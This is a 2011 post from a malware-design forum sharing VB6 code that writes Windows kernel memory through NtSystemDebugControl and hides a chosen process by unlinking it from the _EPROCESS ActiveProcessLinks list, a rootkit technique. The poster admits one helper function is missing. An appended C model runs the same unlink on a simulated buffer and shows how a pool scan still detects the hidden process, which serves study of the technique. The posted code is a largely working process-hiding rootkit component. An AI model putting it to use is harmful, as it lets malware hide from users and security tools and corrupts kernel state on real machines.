elhacker.net forum > Seguridad Informática > Análisis y Diseño de Malware
Topic: [Small contribution] VB Inject KM from UM (read 2,772 times)
Author: Miseryk
« on: 11 July 2011, 21:31 »

Hi, here is some code that may be useful to those who know a lot. I managed to fix it up a bit but I don't understand how it works; what it does is inject into kernel mode from user mode.

Form1:
```vb
Option Explicit

Private Sub Command1_Click()
    Dim pEP As Long
    Dim le As LIST_ENTRY

    ' NtSystemDebugControl requires SeDebugPrivilege to be enabled in this process.
    ' 20 is the LUID value of SeDebugPrivilege; the call is left disabled as in the original.
    'Call RtlAdjustPrivilege(20, 1, 0, 1)

    ' _EPROCESS address of the PID typed into Text1.
    ' GetEProcess is the piece of code missing from this post (see the edit at the end).
    pEP = GetEProcess(Text1.Text)

    ' Dereference _EPROCESS.ActiveProcessLinks. Offset 0x88 is the 32-bit Windows XP
    ' layout; it differs on other Windows versions.
    Call ReadKernelMemory(pEP + &H88, VarPtr(le), 8)

    MsgBox "Blink: " & Hex$(le.pBlink) & vbCrLf & "Flink: " & Hex$(le.pFlink)
    Stop ' breakpoint: inspect le in the debugger before patching kernel memory

    ' Unlink B (the target process) from the chain A <-> B <-> C.
    ' A.Flink = &C   i.e. *(B.Blink + 0) = le.pFlink   A now points forward to C instead of B
    Call WriteKernelMemory(le.pBlink, VarPtr(le.pFlink), 4)
    ' C.Blink = &A   i.e. *(B.Flink + 4) = le.pBlink   C now points back to A instead of B
    Call WriteKernelMemory(le.pFlink + 4, VarPtr(le.pBlink), 4)
End Sub

Private Sub Form_Load()
    ' Pre-fills the box with this process's PEB address (Command1_Click treats the box as a PID).
    Text1.Text = GetPEBAddress
End Sub
```
Module1:
```vb
Option Explicit

' To modify kernel memory from user mode you can use the NtSystemDebugControl API function.
'
' Found it on some Chinese forum =].
' You wouldn't believe the kind of crazy stuff they implement inside of VB6. (Most I cannot
' understand though because I lack knowledge of ASM.)
'
' That code has really opened new doors for me and really got me interested in kernel data
' structures, rootkits, WinDbg, and the book "Subverting the Windows Kernel".
' In any case, here is an example of hiding a process by unlinking it from the _EPROCESS chain
' at 0x88 (I think WinDbg calls the member ActiveProcessLinks).
'
' Note: the SysDbgReadVirtual/SysDbgWriteVirtual control codes (8/9) used below are honoured on
' Windows XP/2003 (32-bit); later versions refuse them unless the machine is booted with kernel
' debugging enabled. The caller also needs SeDebugPrivilege.

Public Type LIST_ENTRY
    pFlink As Long
    pBlink As Long
End Type

'http://forum.sysinternals.com/tip-run-process-in-system-account-scexe_topic16714_post88025.html

' NTSTATUS NtSystemDebugControl(SYSDBG_COMMAND, PVOID InputBuffer, ULONG InputBufferLength,
'                               PVOID OutputBuffer, ULONG OutputBufferLength, PULONG ReturnLength)
Public Declare Function NtSystemDebugControl Lib "NTDLL" (ByVal ControlCode As Long, ByRef InputBuffer As Any, ByVal InputBufferLength As Long, ByRef OutputBuffer As Any, ByVal OutputBufferLength As Long, ByRef ReturnLength As Long) As Long

' NTSTATUS RtlAdjustPrivilege(ULONG Privilege, BOOLEAN Enable, BOOLEAN CurrentThread, PBOOLEAN Enabled)
' Declared here so the SeDebug call in Form1 compiles if it is enabled.
Public Declare Function RtlAdjustPrivilege Lib "NTDLL" (ByVal Privilege As Long, ByVal Enable As Byte, ByVal CurrentThread As Byte, ByRef Enabled As Byte) As Long

' SYSDBG_VIRTUAL: the input buffer for SysDbgReadVirtual / SysDbgWriteVirtual
Public Type MEMORY_CHUNKS
    VirtualAddress As Long ' kernel virtual address to read from / write to
    Buffer As Long         ' user-mode buffer address
    BufferSize As Long     ' number of bytes
End Type

Public Const DebugReadVirtualMemory& = 8  ' SysDbgReadVirtual
Public Const DebugWriteVirtualMemory& = 9 ' SysDbgWriteVirtual

Public Type PROCESS_BASIC_INFORMATION
    ExitStatus As Long                   'NTSTATUS
    PebBaseAddress As Long               'PPEB
    AffinityMask As Long                 'ULONG_PTR
    BasePriority As Long                 'KPRIORITY
    UniqueProcessId As Long              'ULONG_PTR
    InheritedFromUniqueProcessId As Long 'ULONG_PTR
End Type

Public Declare Function ZwQueryInformationProcess Lib "NTDLL.DLL" (ByVal ProcessHandle As Long, ByVal ProcessInformationClass As PROCESSINFOCLASS, ByVal ProcessInformation As Long, ByVal ProcessInformationLength As Long, ByRef ReturnLength As Long) As Long

Public Enum PROCESSINFOCLASS
    ProcessBasicInformation
    ProcessQuotaLimits
    ProcessIoCounters
    ProcessVmCounters
    ProcessTimes
    ProcessBasePriority
    ProcessRaisePriority
    ProcessDebugPort
    ProcessExceptionPort
    ProcessAccessToken
    ProcessLdtInformation
    ProcessLdtSize
    ProcessDefaultHardErrorMode
    ProcessIoPortHandlers ' Note: this is kernel mode only
    ProcessPooledUsageAndLimits
    ProcessWorkingSetWatch
    ProcessUserModeIOPL
    ProcessEnableAlignmentFaultFixup
    ProcessPriorityClass
    ProcessWx86Information
    ProcessHandleCount
    ProcessAffinityMask
    ProcessPriorityBoost
    ProcessDeviceMap
    ProcessSessionInformation
    ProcessForegroundInformation
    ProcessWow64Information
    ProcessImageFileName
    ProcessLUIDDeviceMapsEnabled
    ProcessBreakOnTermination
    ProcessDebugObjectHandle
    ProcessDebugFlags
    ProcessHandleTracing
    ProcessIoPriority
    ProcessExecuteFlags
    ProcessResourceManagement
    ProcessCookie
    ProcessImageInformation
    MaxProcessInfoClass ' MaxProcessInfoClass should always be the last enum
End Enum

Public Declare Function NtCurrentTeb Lib "NTDLL" () As Long

Public Declare Function IsBadReadPtr Lib "kernel32" (ByVal lp As Long, ByVal ucb As Long) As Long

' Length is a SIZE_T, so it must be a Long (the original declared it as Integer)
Public Declare Sub RtlMoveMemory Lib "kernel32" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Long)

Public Function GetPEBAddress() As Long
    On Error GoTo NotSupported
    Dim pbi As PROCESS_BASIC_INFORMATION, Dummy As Long

    ' -1 is the pseudo-handle for the current process
    If ZwQueryInformationProcess(-1&, ProcessBasicInformation, VarPtr(pbi), Len(pbi), Dummy) = 0 Then
        GetPEBAddress = pbi.PebBaseAddress
    Else
        GetPEBAddress = GetPEBAddressinXP
    End If
NotSupported:
End Function

' Both helpers return the NTSTATUS from NtSystemDebugControl (0 = STATUS_SUCCESS).
Public Function ReadKernelMemory(ByVal VirtualAddress As Long, ByVal Buffer As Long, ByVal BufferSize As Long) As Long
    Dim MemoryChunks As MEMORY_CHUNKS
    MemoryChunks.VirtualAddress = VirtualAddress
    MemoryChunks.Buffer = Buffer
    MemoryChunks.BufferSize = BufferSize
    ReadKernelMemory = NtSystemDebugControl(DebugReadVirtualMemory, MemoryChunks, Len(MemoryChunks), ByVal 0&, 0, ByVal 0&)
End Function

Public Function WriteKernelMemory(ByVal VirtualAddress As Long, ByVal Buffer As Long, ByVal BufferSize As Long) As Long
    Dim MemoryChunks As MEMORY_CHUNKS
    MemoryChunks.VirtualAddress = VirtualAddress
    MemoryChunks.Buffer = Buffer
    MemoryChunks.BufferSize = BufferSize
    WriteKernelMemory = NtSystemDebugControl(DebugWriteVirtualMemory, MemoryChunks, Len(MemoryChunks), ByVal 0&, 0, ByVal 0&)
End Function

Public Function GetPEBAddressinXP() As Long
    On Error GoTo NotSupported ' Windows 9x/Me: NtCurrentTeb does not exist and raises an error
    Dim pTeb As Long, ppPeb As Long, pPeb As Long
    pTeb = NtCurrentTeb ' get TEB

    If pTeb = 0 Then Exit Function ' invalid TEB, bail out
    ' +0x030 ProcessEnvironmentBlock : _PEB (32-bit TEB layout)
    ppPeb = pTeb + &H30&
    ' check the pointer is readable
    If IsBadReadPtr(ppPeb, 4) Then Exit Function
    ' copy the 4-byte PEB pointer into a local and return it
    ' (the original copied into GetPEBAddress, which re-entered the caller instead of setting the result)
    RtlMoveMemory VarPtr(pPeb), ppPeb, 4
    GetPEBAddressinXP = pPeb
NotSupported:
End Function
```

Anyone who wants to contribute knowledge and explanations of how it works is welcome :). Regards.

Edit:
Some code is missing that I could neither obtain nor complete.
« Last modified: 12 July 2011, 03:14 by Miseryk »
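An added example, not part of the post above and not Miseryk's code: a C model of the same unlink, run against a constructed in-process buffer that stands in for kernel memory rather than against a real kernel. read_kernel/write_kernel play the role of the post's ReadKernelMemory/WriteKernelMemory; the offsets 0x84 (UniqueProcessId) and 0x88 (ActiveProcessLinks) are the 32-bit Windows XP _EPROCESS layout, and the "Proc" tag, the PIDs and the addresses are invented for the demo. It shows what the two WriteKernelMemory calls do to the neighbours A and C, that a walk from PsActiveProcessHead in either direction no longer sees the process, that the hidden entry's own pointers are untouched (the scheduler does not use this list, so the process keeps running), and that a scan of the memory for _EPROCESS blocks still finds it, which is the cross-view check detectors use against this kind of DKOM hiding. Two caveats the post does not state: the 0x88 offset only holds for 32-bit XP builds, and the SysDbgReadVirtual/SysDbgWriteVirtual control codes are refused on Windows Vista and later unless the machine is booted with kernel debugging enabled, so the VB code works as posted only on XP/2003.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model: a flat buffer stands in for kernel virtual memory. */
#define KERNEL_BASE   0x80000000u
#define KMEM_SIZE     0x1000
#define HEAD_OFF      0x10       /* fake PsActiveProcessHead (a bare LIST_ENTRY) */
#define EPROC_STRIDE  0x200      /* spacing of the fake _EPROCESS blocks */
#define OFF_PID       0x84       /* _EPROCESS.UniqueProcessId, 32-bit XP */
#define OFF_LINKS     0x88       /* _EPROCESS.ActiveProcessLinks, 32-bit XP */
#define EPROC_TAG     0x636f7250u /* "Proc": constructed marker for pool scanning */
#define NPROCS        4

typedef struct { uint32_t Flink, Blink; } LIST_ENTRY32;

static uint8_t kmem[KMEM_SIZE];
static const uint32_t sample_pids[NPROCS] = { 4, 368, 1234, 2000 }; /* constructed */

static int va_ok(uint32_t va, uint32_t len) {
    return va >= KERNEL_BASE && va - KERNEL_BASE + len <= KMEM_SIZE;
}
/* Same contract as the post's ReadKernelMemory/WriteKernelMemory: 0 on success. */
static int read_kernel(uint32_t va, void *buf, uint32_t len) {
    if (!va_ok(va, len)) return -1;
    memcpy(buf, kmem + (va - KERNEL_BASE), len);
    return 0;
}
static int write_kernel(uint32_t va, const void *buf, uint32_t len) {
    if (!va_ok(va, len)) return -1;
    memcpy(kmem + (va - KERNEL_BASE), buf, len);
    return 0;
}
static uint32_t eproc_va(int i) { return KERNEL_BASE + 0x100 + i * EPROC_STRIDE; }

/* Build head <-> P0 <-> P1 <-> P2 <-> P3 <-> head; returns the head's VA. */
static uint32_t build_list(void) {
    uint32_t head = KERNEL_BASE + HEAD_OFF, node[NPROCS + 1], tag = EPROC_TAG;
    node[0] = head;
    for (int i = 0; i < NPROCS; i++) {
        node[i + 1] = eproc_va(i) + OFF_LINKS;   /* links point at the field, not the block */
        write_kernel(eproc_va(i), &tag, 4);
        write_kernel(eproc_va(i) + OFF_PID, &sample_pids[i], 4);
    }
    for (int i = 0; i <= NPROCS; i++) {
        LIST_ENTRY32 le = { node[(i + 1) % (NPROCS + 1)], node[(i + NPROCS) % (NPROCS + 1)] };
        write_kernel(node[i], &le, sizeof le);
    }
    return head;
}

/* The two writes from Form1: A.Flink = &C, then C.Blink = &A. B is never touched. */
static int unlink_process(uint32_t ep) {
    LIST_ENTRY32 le;
    if (read_kernel(ep + OFF_LINKS, &le, sizeof le)) return -1;
    if (write_kernel(le.Blink + 0, &le.Flink, 4)) return -1;  /* *(B.Blink+0) = B.Flink */
    if (write_kernel(le.Flink + 4, &le.Blink, 4)) return -1;  /* *(B.Flink+4) = B.Blink */
    return 0;
}

/* Enumerate PIDs by following the list, as the kernel's own process enumeration does. */
static int walk_active_list(uint32_t head, int backward, uint32_t *pids, int max) {
    LIST_ENTRY32 le; int n = 0; uint32_t cur;
    if (read_kernel(head, &le, sizeof le)) return -1;
    for (cur = backward ? le.Blink : le.Flink; cur != head; cur = backward ? le.Blink : le.Flink) {
        if (n >= max) return -1;                           /* longer than expected: corrupted */
        if (read_kernel(cur - OFF_LINKS + OFF_PID, &pids[n++], 4)) return -1;
        if (read_kernel(cur, &le, sizeof le)) return -1;
    }
    return n;
}

/* Cross-view: find _EPROCESS blocks by signature, independent of the list. */
static int scan_pool(uint32_t *pids, int max) {
    int n = 0;
    for (uint32_t off = 0; off + OFF_LINKS + 8 <= KMEM_SIZE && n < max; off += 0x10) {
        uint32_t tag;
        read_kernel(KERNEL_BASE + off, &tag, 4);
        if (tag == EPROC_TAG) read_kernel(KERNEL_BASE + off + OFF_PID, &pids[n++], 4);
    }
    return n;
}

/* The hidden block still holds valid Flink/Blink to its old neighbours. */
static int links_intact(uint32_t ep, uint32_t *flink, uint32_t *blink) {
    LIST_ENTRY32 le;
    if (read_kernel(ep + OFF_LINKS, &le, sizeof le)) return 0;
    *flink = le.Flink; *blink = le.Blink;
    return va_ok(le.Flink, 8) && va_ok(le.Blink, 8);
}

static void show(const char *label, int n, const uint32_t *pids) {
    printf("%s: %d pids:", label, n);
    for (int i = 0; i < n; i++) printf(" %u", pids[i]);
    printf("\n");
}

int main(void) {
    uint32_t head = build_list(), pids[8];
    show("list walk before unlink", walk_active_list(head, 0, pids, 8), pids);
    unlink_process(eproc_va(2));                       /* hide PID 1234 */
    show("list walk after unlink ", walk_active_list(head, 0, pids, 8), pids);
    show("pool scan after unlink ", scan_pool(pids, 8), pids);
    return 0;
}
```

Walking forward and backward after the unlink gives the same three PIDs, so the list is still consistent and nothing that iterates it will fault; only a view that does not depend on the list (the pool scan here, or handle/thread cross-references in a real detector) reveals the fourth process.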
